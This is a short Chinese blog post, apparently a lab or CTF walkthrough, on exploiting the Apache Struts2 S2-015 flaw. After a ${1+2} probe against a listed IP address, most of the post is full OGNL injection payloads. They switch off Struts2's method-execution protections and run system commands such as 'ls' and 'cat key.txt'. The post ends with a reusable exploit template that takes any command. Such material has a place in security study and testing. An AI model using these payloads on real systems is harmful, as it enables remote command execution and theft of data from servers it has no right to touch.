首页 > 其他 > 详细

【Struts2-命令-代码执行突破分析系列】S2-015

时间:2020-04-16 15:29:22      阅读:105      评论:0      收藏:0      [点我收藏+]

测试漏洞

http://219.153.49.228:45828/${1+2}.action

 

 
技术分享图片
 

表达式进行了计算,表示漏洞存在,开始构造exp

读取当前文件夹的文件

${#context[xwork.MethodAccessor.denyMethodExecution]=false,#m=#_memberAccess.getClass().getDeclaredField(allowStaticMethodAccess),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(ls).getInputStream()),#q}.action

 

 

 
技术分享图片
 

 

读取key.txt

${#context[xwork.MethodAccessor.denyMethodExecution]=false,#m=#_memberAccess.getClass().getDeclaredField(allowStaticMethodAccess),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(cat key.txt).getInputStream()),#q}.action

 

 

 
技术分享图片
 

Exp代码:

${#context[xwork.MethodAccessor.denyMethodExecution]=false,#m=#_memberAccess.getClass().getDeclaredField(allowStaticMethodAccess),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec([命令]).getInputStream()),#q}.action

 

 

【Struts2-命令-代码执行突破分析系列】S2-015

原文:https://www.cnblogs.com/ssan/p/12712695.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!